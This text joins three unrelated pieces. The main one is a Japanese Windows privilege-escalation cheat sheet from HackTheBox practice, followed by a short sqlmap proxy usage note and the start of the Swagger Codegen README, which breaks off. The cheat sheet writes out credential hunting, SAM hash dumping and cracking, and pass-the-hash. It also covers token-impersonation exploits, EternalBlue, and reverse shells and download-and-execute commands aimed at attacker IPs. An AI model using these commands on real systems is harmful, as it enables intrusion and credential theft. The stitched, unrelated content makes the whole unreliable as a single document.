findstr /si password *.xml
findstr /si password *.ini
```
```
C:\> dir /b /s unattend.xml
C:\> dir /b /s web.config
C:\> dir /b /s sysprep.inf
C:\> dir /b /s sysprep.xml
C:\> dir /b /s *pass*
C:\> dir /b /s vnc.ini
```
## Passwords - Registry
レジストリ内に保存されているパスワードを検索する。
```
# HKLM
reg query HKLM /f pass /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
# HKCU
reg query HKCU /f pass /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```
```
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
```
winexeコマンド(LinuxからWindows上のコマンドを実行できるツール)を使用して、管理者権限で実行されているコマンドプロンプトを生成する。
上記のコマンドによる検索結果で発見したパスワードを利用して生成する。
```
winexe -U 'admin%password' //10.10.10.1 cmd.exe
```
## Passwords - Saved Creds
保存されている資格情報を一覧表示する。
```
cmdkey /list
```
「admin」ユーザーの資格情報が保存されていることを確認する。
最後に、netcatでlistenしてから管理者ユーザーの保存されたクレデンシャルを利用してrunasコマンドでreverse shellペイロードを実行する。
```
runas /savecred /user:admin C:\PrivEsc\reverse.exe
```
## Passwords - Security Account Manager (SAM)
SAMファイルとSYSTEMファイルのバックアップを安全に保存されていない場合、これらのファイルを使用してユーザーのパスワードハッシュを抽出することができる。
```
# smbを利用したファイルの共有
copy C:\Windows\Repair\SAM \\10.10.10.10\kali\
copy C:\Windows\Repair\SYSTEM \\10.10.10.10\kali\
```
creddump7を利用してSAMファイルとSYSTEMファイルからハッシュをダンプする。
```
/usr/share/creddump7/pwdump.py SYSTEM SAM
```
hashcatを使用してNTLMハッシュをクラックする。
```
例)
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
hashcat -m 1000 --force 26112010952d963c8dc4217daec986d9 /usr/share/wordlists/rockyou.txt
or
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hash
```
## Passwords - Pass The Hash
ハッシュを使用して認証できるため、hashcatなどでパスワードクラックせずとも管理者ハッシュでログインできる。
```
pth-winexe -U 'admin%<転んで区切られたLMハッシュとLTLMハッシュの両方が含まれているもの>' //10.10.10.1 cmd.exe
例)
pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //10.10.12.15 cmd.exe
```
## Scheduled Tasks
スケジュールされているスクリプトがSYSTEM権限で実行されており、ファイルに書き込み権限がある場合、reverse shellペイロードを実行するようにスクリプトを書き換えてやることでSYSTEM権限のシェルを取得することができる。
```
# スケジュールの一覧を表示
(これでは見つからないことが多いため、スケジュールされたタスクが実行されていることを示すスクリプトやログファイルを手動で見つける必要がある)
C:> schtasks /query /fo LIST /v
PS> Get-ScheduledTask | where {$_.TaskPath -notlike “\Microsoft*”} | ft TaskName,TaskPath,State
```
```
# ファイルへの書き込み権限を確認
accesschk.exe /accepteula -quvw user C:\Users\user\Desktop\task.ps1
```
```
# reverse shellペイロードを実行するスクリプトを追記
echo C:\Windows\Temp\reverse.exe >> C:\Users\user\Desktop\task.ps1
```
netcatでlistenしておき、スケジュールされたタスクが実行されるのを待ち、システム権限のシェルを取得する。
## Insecure GUI Apps
RDP(リモートデスクトップ)などでアクセスした際に、管理者権限で実行できるソフトウェアがある場合、それらを介してcmd.exeを起動することでSYTEM権限のシェルを取得する。
例えば、管理者権限で動作するペイントを仮定する。
```
# 管理者権限でmspain.exeが起動されていることを確認
tasklist /V | findstr mspaint.exe
```
ペイントの[ファイル]→[開く]を押下して、file://c:/windows/system32/cmd.exeを開く。
これにより、SYSTEM権限のシェルを取得することができる。
## Startup Apps
accesschk.exeを使用してBUILTIN\UsersグループがStartUpデディレクトリにファイルを書き込むことができることを確認。
```
accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
```
その後、StartUpディレクトリにreverse shellペイロードのショートカットなどを配置して、netcatでlistenしながら管理者権限でログインされることで、SYSTEM権限のシェルを取得できる。
```
# ショートカットを生成するvbsスクリプト
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\Users\<reverse shellペイロードが配置されているパス>.exe"
oLink.Save
# cscriptを利用して上記のvbsスクリプトを起動
cscript shortcut.vbs
```
## Token Impersonation - Juicy Potato
```
Tips: ポテトアタックの歴史
WindowsのサービスアカウントからNT AUTHORITY/SYSTEMに特権を昇格させるために使われるポテトには、多くの種類がある。
Hot、Rotten、Lonely、Juicy、Rogueは、ポテトエクスプロイトのファミリーです。
すべてのポテトアタックには独自の制限があります。
攻撃対象のマシンが >= Windows 10 1809 & Windows Server 2019 の場合 - Rogue Potato を試してみてください。
攻撃対象のマシンが < Windows 10 1809 < Windows Server 2019 の場合 - Juicy Potato を試してみてください。
```
「whoami /priv」コマンドを使用して、いずれかの権限を持っており「攻撃対象のマシンが < Windows 10 1809 < Windows Server 2019 の場合」にJuicy Potatoのエクスプロイトが機能する可能性がある。
- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
```
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSystemtimePrivilege Change the system time Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
```
```
JuicyPotato.exe -l 9000 -p C:\Windows\Temp\shell.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}
```
- -l...COMサーバのlisten port(競合しているポートでなければどのポートでも機能はする)
- -p...使用するペイロードの選択(事前に転送しているペイロードなど)
- -t...createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
- -c...CLSID(default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
CLSIDは、./juicy-potato/CLSID/から対応するOSを選択してUserが NT AUTHORITY\SYSTEMになっているものを指定する。
https://github.com/ohpe/juicy-potato/tree/master/CLSID
もしくは、./juicy-potato/CLSID/GetCLSID.ps1を利用してCLSIDを取得する。
powershellが何かの理由により使用できない場合、JuicyPotato.exe(test_clsid.batの内容に合わせるためjuicypotato.exeに名前を変更)と./juicy-potato/CLSID/<対応するOS>/CLSID.list/、./juicy-potato/Test/test_clsid.batをターゲットマシンに配置してCLSIDを集める。
ターゲット端末でtest_clsid.batを5分間起動してから、出力されたresult.logを確認してCLSIDを取得する。
## Token Impersonation - Rogue Potato
「whoami /priv」コマンドを使用して、いずれかの権限を持っており「攻撃対象のマシンが >= Windows 10 1809 & Windows Server 2019 の場合」にRouge Potatoのエクスプロイトが機能する可能性がある。
- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
```
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.10.180:9999
nc -lvnp 9999
```
```
RoguePotato.exe -r <Attacker IP> -e "<payload>" -l <Attacker Port>
RoguePotato.exe -r 10.10.16.2 -e "c:\windows\temp\nc.exe 10.10.16.2 9999 -e cmd.exe" -l 9999
RoguePotato.exe -r 10.10.16.2 -c "{B91D5831-B1BD-4608-8198-D72E155020F7}" -e "c:\windows\temp\nc.exe 10.10.16.2 9999 -e cmd.exe" -l 9999
```
- -r...リモートIPアドレス(攻撃者端末のIP)
- -e...reverse shellペイロードのパス
- -l...リスニングポート(攻撃者端末の待ち受けポート)
- -c...CLSIDの指定({B91D5831-B1BD-4608-8198-D72E155020F7}はUsoSvcのもの)
## Token Impersonation - PrintSpoofer
上記で得られたシェルでwhoami /privコマンドを使用すると下記のような結果を得られる。
この時、いずれかの権限を持っている場合にRouge Potatoのエクスプロイトが機能する。
- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
ここまでの流れとして、先ほどのRogue Potatoと同じ条件となる。
最後にlocal serviceのreverse shellが返ってきているシェルでPrintSpooferエクスプロイトを実行して、SYTEM権限のシェルを取得する。
```
PrintSpoofer.exe -c "C:\Windows\Temp\reverse.exe(reverse shellペイロードが配置されているパス)" -i
```
もしくは、
```
PrintSpoofer.exe -i -c cmd.exe
PrintSpoofer.exe -i -c powershell.exe
```
などにより権限昇格可能。
## Kernel Exploit
### 手動列挙
```
systeminfo
```
```
searchsploit Microsoft Windows [OS version];
searchsploit Microsoft Windows [build number]
```
### windows-exploit-suggester(自動列挙)
windowsでexploitを列挙するためのスクリプト
systeminfoコマンドの出力が必要
```
# ファイルの更新
./windows-exploit-suggester.py --update
# xlrdのインストール(最新バージョンだと動作しないためxlrd1.2.0を利用)
pip2 install xlrd==1.2.0
```
```
systeminfo > systeminfo.txt
./windows-exploit-suggester.py --database 2020-06-08-mssb.xls --systeminfo systeminfo.txt
```
### Sherlock.ps1
```
# Find-Allchecks(powershell.exe)
IEX(New-Object Net.WebClient).downloadstring('http://10.10.16.3:8000/Sherlock.ps1')
# Find-AllVulns(cmd.exe)
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.3:8000/Sherlock.ps1');Find-AllVulns | powershell -noprofile -
```
### Watson.ps1
[comming soon]
### Driver Exploit
下記のコマンドでシステムにインストールされているドライバーを列挙する。
```
driverquery /v
```
サードパーティのドライバーが存在する場合、パッチが適切に当てられていない可能性があり権限昇格に利用できる可能性がある。
例) USBPcap
```
┌──(root💀96a278f1d4e0)-[/]
└─# searchsploit USBPcap
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
USBPcap 1.1.0.0 (WireShark 2.2.5) - Local Privilege Escalation | windows/local/41542.c
---------------------------------------------------------------------------------- ---------------------------------
```
```
type C:\Program Files\USBPcap\USBPcap.inf
...
DriverVer=10/02/2015,1.1.0.0
```
### Windows-kernel-exploits
コンパイル済みのカーネルエクスプロイト用バイナリが用意されている。
Windows-kernel-exploits:
https://github.com/SecWiki/windows-kernel-exploits.git
### MS17-010_EternalBlue(without metasploit)
エクスプロイトに必要なものを準備。
この最後のmysmb.pyをダウンロードしておかないと、ImportError:mysmbと警告が出る。
```
git clone https://github.com/worawit/MS17-010
```
次にimpacketもインストールしておかないと使うことができないので入っていない場合は落としておく。
```
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip2 install .
```
もしもここでpipが入っていないと警告が出た場合は、pipもインストールしておく。
```
sudo apt install python-pip
```
次に、リバースシェルに使うペイロードをmsfvenomを利用して作成する。
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=1234 -f exe > reverse.exe
```
zzz_exploit.pyを使用する。
次にzzz_exploit.pyのソースコードを変更してエクスプロイトに使用できるようにする。
まずUSERNAMEのところを下記の画像のように変更。
![](./image/2021-05-06-17-48-11.png)
次にsmb_pwn関数内のスクリプトを下記の画像のように変更。
![](./image/2021-05-06-17-48-54.png)
これで準備は完了。
通信を受けるためにnetcatで待ち受けておく。
```
nc -lvp 1234
```
最後にzzz_exploit.pyを実行。
named pipeが必要なため、ここではntsvcsを指定する。
```
┌─[✗]─[yukitsukai@parrot]─[~/htb/Blue]
└──╼ $python2 eternalblue.py 10.10.10.40 ntsvcs
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8001af9560
SESSION: 0xfffff8a001bf5de0
.
.
.
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
```
通信を待ち受けていたnetcatの方でシェルが取得できる。
![](./image/2021-05-06-17-49-20.png)
## Tips
### 侵入先情報の列挙
```
systeminfo
echo %username%
```
### reverse_shell
#### netcatを転送
```
certutil.exe -urlcache -split -f http://10.10.10.1/nc.exe C:\Windows\Temp\nc.exe
C:Windows\Temp\nc.exe -e cmd 10.10.10.1 4444
```
### Downloads
```
curl http://10.10.10.1:9000/putty.exe -o putty.exe
certutil -urlcache -split -f http://10.10.14.11:9000/rs.exe" C:\Windows\Temp\rs.exe
bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe
powershell -c (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.11:9000/rs.exe', 'rs.exe')
powershell -c (Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe")
powershell -c (wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe")
powershell -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe")
```
### SMBファイル共有
```
攻撃側(送信側):
python3 /usr/share/doc/python3-impacket/examples/smbserver.py temp .
```
```
被害者(受信側):
# 共有ディレクトリの列挙
net view \\10.10.10.1
# 共有ディレクトリ内のファイルを列挙
dir \\10.10.10.1\temp
# ローカルにコピー
copy \\10.10.10.1\temp\rs.exe rs.exe
```
### ファイル検索
```
dir /s /b <ファイル名>
dir /s /b flag*
```
- /s...サブフォルダまで含めたファイルまで検索対象とする
- /b...ファイル名だけ表示
## cmd.exe
### runas
```
# 保存されている認証情報を使用
C:\Windows\System32\runas.exe runas /savecred /user:WORKGROUP\Administrator
# 認証情報を入力
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "shell.exe"
```
## PowerShell
### PowerShellスクリプトの実行
```
現在のユーザーの実行ポリシーの確認:
Get-ExecutionPolicy -Scope CurrentUser
現在のユーザーの実行ポリシーの変更:
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
```
#### PowerShellが配置されているディレクトリ
```
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
```
#### Download & Execute
```
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1:8000/PowerUp.ps1')"
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.16.3:8000/PowerUp.ps1')|iex"
# cmd.exe
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile -
# PowerShell v3
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
```
#### Base64 Encording
```
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1/PowerUp.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
```
#### ^Nishang
```
# powershell.exe
PS C:\> IEX (New-Object Net.WebClient).DownloadString('http://10.9.252.239:9999/nishang.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.1 -Port 4444
# cmd.exe
C:> echo IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3:8000/nishang.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.1 -Port 4444 | powershell -noprofile -
```
#### Powercat
```
powershell -exec bypass -c "iwr('http://10.10.10.1:8000/powercat.ps1')|iex;powercat -c 10.10.10.1 -p 4444 -e cmd"
```
### ^PowerUp.ps1
```
# Powershellの起動
C:> powershell.exe -nop -exec bypass
# PowerUpモジュールのインポート
PS C:\> Import-Module PowerUp.ps1
# PowerUpの実行(All-Check関数を使用)
PS C:\> Invoke-AllChecks
# Invoke-AllChecks(powershell.exe)
IEX(New-Object Net.WebClient).downloadstring('http://10.10.10.1:8000/PowerUp.ps1');Invoke-AllChecks
# Invoke-AllChecks(cmd.exe)
C:> echo IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3:8000/PowerUp.ps1');Invoke-AllChecks | powershell -noprofile -
```
```
# One Liner
C:\> powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
```
```
# ディスクに触れずにPowerUpを実行
C:\> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.1:8000/PowerUp.ps1'); Invoke-AllChecks"
```
## Metasploit
### Metasploit(token impersonation)
```
シークレットモードの読み込み:
msf6 > load_incognito
上記のコマンドで上手くいかない場合
msf6 > use incognito
偽装するトークン一覧を表示:
msf6 > list_tokens -g
トークンの偽装:
msf6 > impersonate_token "BUILTIN\Administrators"
トークン偽装後の権限確認:
msf6 > getuid
```
高い特権トークンを持っていても、実際には特権ユーザーの権限を持っていない場合がある。
この場合、偽装トークン(なりすまし)ではなく、プライマリトークンを使用する必要がある。
選択するのに最も安全なプロセスはservices.exeプロセスである。
```
移行するプロセスを探すためにプロセス一覧の表示:
(service.exeのプロセスを探すのが無難)
msf6 > ps
プロセスの移行:
(service.exeのPIDなどを指定)
msf6 > migrate <PID>
```
### Metasploit(local_exploit_suggester)
exploitをせずに脆弱性をチェックするために使用するモジュール。
meterpreterでシェルを取得している場合、これを使うことで特権昇格に使えるexploitを簡単に探すことができる。
```
msf6 > use post/multi/recon/local_exploit_suggester
```
### evlilwinrm(5985)
WinRM(Windowsリモート管理)を利用したペンテスト特化ツール。
5985ポートが空いている時に使用。
```
# install
gem install evil-winrm
```
```
evil-winrm -u <username> -p <password> -i <remote host ip>
```
## Privilege Escalation(Software)
### Docker
### TeamViewer
TeamViewerではパスワードがWindowsレジストリに保存されている(AES-128-CBC)
```
# TeamViewerの情報を出力
Get-ItemProperty -Path HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7
# SecurityPasswordAESの値を出力
Get-ItemPropertyValue -LiteralPath 'HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7' -Name SecurityPasswordAES
255
155
28
115
214
107
206
49
....
```
teamviewer_password_decrypt.py:
このスクリプトによりdecrypt可能
https://gist.github.com/rishdang/442d355180e5c69e0fcb73fecd05d7e0
## PrivEsc Tools(Windows)
Windows Sysinternals:
https://docs.microsoft.com/en-us/sysinternals/
PEASS-ng(winpeas.bat):
https://github.com/carlospolop/PEASS-ng
PowerSploit(PowerUp.ps1):
https://github.com/PowerShellMafia/PowerSploit.git
Nishang:
https://github.com/samratashok/nishang.git
Powercat:
https://github.com/besimorhino/powercat.git
Sherlock:
https://github.com/rasta-mouse/Sherlock.git
creddump7:
https://github.com/Tib3rius/creddump7
juicy-potato(x64):
https://github.com/ohpe/juicy-potato.git
juicy-potato(x86バイナリ):
https://github.com/ivanitlearning/Juicy-Potato-x86.git
RoguePotato:
https://github.com/antonioCoco/RoguePotato.git
PrintSpoofer:
https://github.com/itm4n/PrintSpoofer.git
Windows-kernel-exploits:
https://github.com/SecWiki/windows-kernel-exploits.git
# Experience with HackTheBox(動作確認済みexploit)
## Initial Shell(Linux)
```
Samba 3.0.20:
https://github.com/amriunix/CVE-2007-2447.git
Elastix Elastix 2.2.0 - 'graph.php' Local File Inclusion
https://www.exploit-db.com/exploits/37637
FreePBX 2.10.0/Elastix 2.2.0 - Remote Code Execution:
https://www.exploit-db.com/exploits/18650
'extension'はsvwarを使用してreqauthとなっている数値をを指定
例) svwar -m INVITE -e100-999 10.10.10.7
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection:
https://www.exploit-db.com/exploits/24044
Apache James Server 2.3.2 - Remote Command Execution:
使用条件としてJAMES Remote Administrationがデフォルトのroot:rootでログインできるのに加えて、エクスプロイト実行後に誰かがログインする必要がある。
エクスプロイト後にsshなどでログインされることでペイロードが発火するため、実世界では誰かがログインするのを待つ必要がある。
https://www.exploit-db.com/exploits/35513
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection:
認証情報を知っていることが前提となる。
https://www.exploit-db.com/exploits/43560
Nibbleblog 4.0.3 - Arbitrary File Upload
https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure
https://www.exploit-db.com/exploits/32745
Exploit-DBのものより、下記のエクスプロイトの方が使用しやすい
https://gist.github.com/eelsivart/10174134
for i in $(seq 1 100); do python2 heartbleed.py 10.10.10.79; done
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion:
https://www.exploit-db.com/exploits/38861
nostromo 1.9.6 - Remote Code Execution:
https://www.exploit-db.com/exploits/47837
OpenNetAdmin 18.1.1 - Remote Code Execution:
URLにはhttp://10.10.10.171/ona/ のように最後にスラッシュを付ける。
https://www.exploit-db.com/exploits/47691
```
## Privilege Escalation(Linux)
```
PAM 1.1.0:
.sshディレクトリの権限を変更しておく(chmod 700 .ssh)
https://github.com/offensive-security/exploitdb/blob/master/exploits/linux/local/14339.sh
GNU Screen 4.5.0 - Local Privilege Escalation:
ターゲットマシンのgccでexploit内のコードをコンパイルできない場合、事前にコンパイル作業を攻撃者環境で済ませてlibhax.soとrootshellバイナリを送信し、41154.sh内のスクリプトを順に手動で実行する
https://www.exploit-db.com/exploits/41154
Chkrootkit 0.49 - Local Privilege Escalation:
/tmp/updateファイルがchkrootkitにより実行される
このため/tmp/updateにmsfvenomで生成したバイナリやreverse shellペイロードを書き込んだスクリプトを配置しておくことで、chkrootkitがroot権限で(uid=0)で実行できるまたはされる状況においてrootシェルを取得できる
https://www.exploit-db.com/exploits/33899
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation:
https://www.exploit-db.com/exploits/45010
Webmin-1.910-Exploit-Script:
https://github.com/roughiz/Webmin-1.910-Exploit-Script
MariaDB 10.2-'wsrep_provider' OS Command Execution
https://github.com/shamo0/CVE-2021-27928-POC
```
## Initial Shell(Windows)
```
MS08-067:
https://github.com/andyacer/ms08_067
HttpFileServer httpd 2.3:
https://www.exploit-db.com/exploits/49125
Drupal 7.x Module Services - Remote Code Execution:
・sudo apt install php-curl
・'data' => '<?php echo system($_REQUEST ["cmd"]); ?>'
https://www.exploit-db.com/exploits/41564
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution:
・sudo gem install highline
https://www.exploit-db.com/exploits/44449
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow:
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010):
https://github.com/worawit/MS17-010
Achat 0.150 beta7 - Remote Buffer Overflow:
https://www.exploit-db.com/exploits/36025
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution:
proc.StartInfo.FileNameをcmd.exeに変更してstring cmdに引数を入れる
その際にstring cmd = "/c certutil..."のように書き換える
https://www.exploit-db.com/exploits/46153
```
## Privilege Escalation(Windows)
```
Juicy-potato(x64):
https://github.com/ohpe/juicy-potato.git
Juicy-potato(x86バイナリ):
https://github.com/ivanitlearning/Juicy-Potato-x86.git
Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation
(Microsoft(R) Windows(R) Server 2003, Standard Edition 5.2.3790 Service Pack 2 Build 3790):
.\churrasco.exe whoami
https://github.com/Re4son/Churrasco.git
MS10-059(Microsoft Windows Server 2008 R2 Standard 6.1.7600 N/A Build 7600):
.\MS10-059.exe 10.10.10.1 4444
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
.\Chimichurri.exe 10.10.16.4 443
https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri
MS15-051(Microsoft Windows Server 2008 R2 Datacenter 6.1.7600 N/A Build 7600):
.\ms15-51.exe whoami
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
MS16-098(Microsoft Windows Server 2012 R2 Standard 6.3.9600 N/A Build 9600):
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098
```
|
## sqlmap_chunked_proxy
![](sqlmap_chunked_proxy.jpeg)
![](sqlmap.jpeg)
![](Wireshark.jpeg)
## Usage:
```bash
python3 sqlmap_chunked_proxy.py
sqlmap -u '' --data '' --proxy=http://127.0.0.1:9999
``` |
# Swagger Code Generator
[![Build Status](https://travis-ci.org/swagger-api/swagger-codegen.png)](https://travis-ci.org/swagger-api/swagger-codegen)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project)
## Overview
This is the swagger codegen project, which allows generation of client libraries automatically from a Swagger-compliant server.
Check out [Swagger-Spec](https://github.com/swagger-api/swagger-spec) for additional information about the Swagger project, including additional libraries with support for other languages and more.
# Table of contents
- [Swagger Code Generator](#swagger-code-generator)
- [Overview](#overview)
- [Table of Contents](#table-of-contents)
- Installation
- [Compatibility](#compatibility)
- [Prerequisites](#prerequisites)
- [OS X Users](#os-x-users)
- [Building](#building)
- [Docker](#docker)
- [Build and run](#build-and-run-using-docker)
- [Build a Node.js server stub](#build-a-nodejs-server-stub)
- [Homebrew](#homebrew)
- Generators
- [To generate a sample client library](#to-generate-a-sample-client-library)
- [Generating libraries from your server](#generating-libraries-from-your-server)
- [Modifying the client library format](#modifying-the-client-library-format)
- [Making your own codegen modules](#making-your-own-codegen-modules)
- [Where is Javascript???](#where-is-javascript)
- [Generating a client from local files](#generating-a-client-from-local-files)
- [Customizing the generator](#customizing-the-generator)
- [Validating your swagger spec](#validating-your-swagger-spec)
- [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation)
- [Generating static html api documentation](#generating-static-html-api-documentation)
- [To build a server stub](#to-build-a-server-stub)
- [Node.js](#nodejs)
- [PHP Silex](#php-silex)
- [Ruby Sinatra](#ruby-sinatra)
- [Scala Scalatra](#scala-scalatra)
- [Java JAX-RS](#java-jax-rs)
- [Java Spring MVC](#java-spring-mvc)
- [To build the codegen library](#to-build-the-codegen-library)
- [Online Generators](#online-generators)
- [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution)
- [License](#license)
## Compatibility
The Swagger Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilies with the swagger specification:
Swagger Codegen Version | Release Date | Swagger Spec compatibility | Notes
-------------------------- | ------------ | -------------------------- | -----
2.1.5-SNAPSHOT | | 1.0, 1.1, 1.2, 2.0 | [master](https://github.com/swagger-api/swagger-codegen)
2.1.4 (**current stable**) | 2015-10-25 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.4](https://github.com/swagger-api/swagger-codegen/tree/v2.1.4)
2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17)
1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1)
### Prerequisites
You need the following installed and available in your $PATH:
* [Java 7](http://java.oracle.com)
* [Apache maven 3.0.3 or greater](http://maven.apache.org/)
#### OS X Users
Don't forget to install Java 7. You probably have 1.6 or 1.8.
Export JAVA_HOME in order to use the supported Java version:
```
export JAVA_HOME=`/usr/libexec/java_home -v 1.7`
export PATH=${JAVA_HOME}/bin:$PATH
```
### Building
After cloning the project, you can build it from source with this command:
```
mvn package
```
### Docker
#### Build and run using docker
```
git clone https://github.com/swagger-api/swagger-codegen
cd swagger-codegen
./run-in-docker.sh mvn package
```
#### Build a Node.js server stub
```
./run-in-docker.sh generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l nodejs \
-o samples/server/petstore/nodejs
```
### Homebrew
To install, run `brew install swagger-codegen`
Here is an example usage:
```
swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/
```
### To generate a sample client library
You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows:
```
./bin/java-petstore.sh
```
This will run the generator with this command:
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java
```
with a number of options. You can get the options with the `help generate` command:
```
NAME
swagger generate - Generate code with chosen lang
SYNOPSIS
swagger generate [(-a <authorization> | --auth <authorization>)]
[(-c <configuration file> | --config <configuration file>)]
[-D <system properties>]
(-i <spec file> | --input-spec <spec file>)
(-l <language> | --lang <language>)
[(-o <output directory> | --output <output directory>)]
[(-t <template directory> | --template-dir <template directory>)]
[(-v | --verbose)]
[(-s | --skip-overwrite)]
OPTIONS
-a <authorization>, --auth <authorization>
adds authorization headers when fetching the swagger definitions
remotely. Pass in a URL-encoded string of name:header with a comma
separating multiple values
-c <configuration file>, --config <configuration file>
Path to json configuration file. File content should be in a json
format {"optionKey":"optionValue", "optionKey1":"optionValue1"...}
Supported options can be different for each language. Run
config-help -l {lang} command for language specific config options.
-D <system properties>
sets specified system properties in the format of
name=value,name=value
-i <spec file>, --input-spec <spec file>
location of the swagger spec, as URL or file (required)
-l <language>, --lang <language>
client language to generate (maybe class name in classpath,
required)
-o <output directory>, --output <output directory>
where to write the generated files (current dir by default)
-t <template directory>, --template-dir <template directory>
folder containing the template files
-v, --verbose
verbose mode
-s , --skip-overwrite
specifies if the existing files should be overwritten during
the generation
```
You can then compile and run the client, as well as unit tests against it:
```
cd samples/client/petstore/java
mvn package
```
Other languages have petstore samples, too:
```
